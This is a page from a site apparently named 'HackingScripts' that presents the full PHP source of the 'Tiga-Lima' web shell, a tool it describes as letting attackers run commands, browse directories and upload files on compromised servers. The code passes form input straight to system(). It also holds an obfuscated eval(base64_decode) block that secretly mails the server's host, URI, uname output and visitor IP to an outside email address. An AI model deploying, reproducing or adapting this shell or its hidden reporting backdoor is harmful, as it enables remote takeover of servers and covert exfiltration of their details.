HackingScripts

Hack Scripts for everybody

Tiga-Lima Shell Script

25 Jan 2014

This simple script enables the attacker to execute commands, change directories, and upload files to the compromised server.

Tiga-Lima Shell Script Source Code

 1 <html>
 2 <head>
 3 <title>tiga-lima SheLL</title>
 4 <style type="text/css">
 5 <!--
 6 body {
 7     background-color: #000000;
 8 }
 9 -->
10 </style>
11 <?php
12 /**
13  * @author chandra35
14  * @copyright 2011
15  */
16  $currentCMD = str_replace("\\\"","\"",$currentCMD);
17 $currentCMD = str_replace("\\\'","\'",$currentCMD);
18 echo "<style>body{font-family:XPBlueText; ms;font-size:10px; color:green;}hr{width:100%;height:1px;}</style>";
19 echo "<center><h1><blink>Mini SheLL Inject</blink></h1></center>";
20 echo "<center>http://www.desawonosari.org</h1></center>";
21 echo "<center>Village of Cyber Team</h1></center>";
22 $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
23 $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
24 $UName  = php_uname();
25 $SCWD   = `pwd`;
26 $UserID = `id`;
27 if( $currentWD == "" ) {
28     $currentWD = $SCWD;
29     }
30 echo "<style>table,body{font-family:Verdana; ms;font-size:10px; color:white;}tr{width:1%;height:1px;}</style>";
31 echo '<table bgcolor="#666659">';
32 echo '<tr>
33 <td>Host Server </td>
34 <td>:'.$_SERVER['REMOTE_HOST'].' ('.$_SERVER['REMOTE_ADDR'].')</td><br>
35 <tr>
36 <td>Server</td>
37 <td width=1185>'.$_SERVER['SERVER_SIGNATURE'].'</td>
38 </tr>
39 <tr>
40 <td>System type </td>
41 <td>:'.$UName.'</td>
42 </tr>
43 <tr>
44 <td>Permissions </td>
45 <td>:'.$UserID.'</td>
46 </tr>';
47 echo "<hr>";
48 if( $_POST['_act'] == "Execute!" ) {
49     $currentCMD = "dir";
50     }
51 echo "<form method=post enctype=\"multipart/form-data\"><table>";
52 echo "<tr><td><b>Execute command :</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
53 echo "<td><input type=submit name=_actt value=\"Execute!\"></td></tr>";
54 echo "<tr><td><b>Change directory :</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
55 echo "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
56 echo "<tr><td><b>Upload file :</b></td><td><input size=85 type=file name=_upl></td>";
57 echo "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
58 echo "<tr><td><blink><font color='red' size=2>Untuk WIN NT</font></blink>:</td><td><input size=85 type=file name=_upl2></td>";
59 echo "<td><input type=submit name=_act2 value=\"Upload!!\"></td></tr>";
60 echo "</table></form><hr>";
61     if( $_POST['_act'] == "Upload!" ) 
62     {
63         if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
64             echo "<center><b>File gak bisa di upload!</b></center>";
65             } 
66             else {
67                 echo "<center><pre>";
68                 system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
69                 echo "</pre><b>File Beerhasil di upload!</b></center>";
70                 }    
71                 } else
72                 if( $_POST['_act2'] == "Upload!!" ) 
73                 {
74                     if(@copy($_FILES['_upl2']['tmp_name'], $_FILES['_upl2']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
75                     else {
76                         echo '<b>Upload GAGAL !!!</b><br><br>';
77                         }
78                         }
79                         else {
80                             echo "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
81                             $currentCMD = "cd ".$currentWD.$currentCMD;
82                             system($currentCMD);
83                             echo "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
84                             }
85                             if ($_POST['_actt'] == "Execute!")
86                             {
87                                 echo "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
88                                 system($_POST['_cmd']);
89                                 echo "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center>";
90                             }
91                             $to="candrashell@yahoo.com";
92                             $pages = @getenv("HTTP_REFERER");
93                             $browser = @getenv("HTTP_USER_AGENT");
94                             eval(base64_decode('JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IA0KJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsgDQokcG9ydCA9ICRfU0VSVkVSIFsiUkVNT1RFX1BPUlQiXTsgDQokYXJhbiA9IGV4ZWMoInVuYW1lIC1hOyIpOyANCiR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07IA0KJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyANCiR0YXJnZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsgDQokYm9keSA9ICIkdGFyZ2V0ICRhcmFuIG9sZWggJHZpc2l0b3IgJHBvcnQiOyANCm1haWwoImNhbmRyYXNoZWxsQHlhaG9vLmNvbSIsIiBMQVBPUiBCT1NTU1NTIEFEQSBidWcgYmFydSBodHRwOi8vJHRhcmdldCAkYXJhbiBvbGVoICR2aXNpdG9yICRwb3J0IiwgIiRib2R5Iik7'));
95 exit;
96 ?>
97 </html>

Tiga-Lima Shell Screenshot

tiga-lima shell screenshot